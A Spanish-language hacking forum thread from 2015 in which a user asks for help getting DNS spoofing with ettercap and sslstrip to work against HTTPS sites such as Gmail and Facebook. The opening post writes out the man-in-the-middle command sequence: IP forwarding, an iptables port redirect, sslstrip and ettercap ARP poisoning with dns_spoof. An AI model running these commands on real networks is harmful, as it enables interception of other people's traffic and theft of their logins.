comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Problema] Dns spoof + sslstrip

  • 2 Respuestas
  • 1048 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado puntoCL

  • *
  • Moderador Global
  • Mensajes: 267
  • Actividad:
    3.33%
  • Reputación 5
  • Magallanes no es chile :D
    • Ver Perfil
« en: Octubre 29, 2015, 05:46:51 pm »
Hola.

Tengo problema con dns spoof con los https investigue y resulte que tenia que ocupar sslstrip pero sigo sin resultado no se si estoy mal en algo y si existe otro tipico de ataque.  el dns spoof lo hago con ettercap "ettercap -T -i wlan1 -M ARP -P dns_spoof -q "

lo que hago es.

echo 1 > /proc/sys/net/ipv4/ip_forward1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1001
sslstrip -f -l 1001

ettercap -T -i wlan0 -M ARP -P dns_spoof -q

no se si estoy haciendo algo mal.

Saludos



« Última modificación: Octubre 29, 2015, 08:12:48 pm por Expermicid »




Desconectado .:UND3R:.

  • *
  • Underc0der
  • Mensajes: 226
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Noviembre 07, 2015, 02:17:20 pm »
Con qué páginas probaste el HTTPS?

gmail? Saludos

Conectado puntoCL

  • *
  • Moderador Global
  • Mensajes: 267
  • Actividad:
    3.33%
  • Reputación 5
  • Magallanes no es chile :D
    • Ver Perfil
« Respuesta #2 en: Noviembre 07, 2015, 02:58:36 pm »
Gmail y facebook la típica paginas. para que se entiendan no quiero esto de robar credencial  solo me interesa el dns spoof




 

¿Te gustó el post? COMPARTILO!



Problema con conexión de troyano pierdo la conexion

Iniciado por Nitro_X_Net

Respuestas: 6
Vistas: 1689
Último mensaje Julio 13, 2015, 03:35:57 am
por .:UND3R:.
[SOLUCIONADO] Problema con Softice 4.05 Help, SoftICE is not active.

Iniciado por d3vilz5

Respuestas: 1
Vistas: 1814
Último mensaje Mayo 17, 2013, 11:52:31 pm
por Krapermors
Booteo en Dell Inspiron Mini "problema"

Iniciado por KnarBlack

Respuestas: 2
Vistas: 672
Último mensaje Febrero 19, 2018, 11:44:52 pm
por KnarBlack
AVs CMLS Registry workshop.. Problema.! "Otra vez yo"

Iniciado por Zobek

Respuestas: 0
Vistas: 1131
Último mensaje Julio 11, 2016, 06:19:19 pm
por Zobek
[SOLUCIONADO] Problema con el systemd en MJ (systemd-modules-load.service)

Iniciado por Thereldor

Respuestas: 1
Vistas: 983
Último mensaje Abril 05, 2016, 11:50:05 pm
por Thereldor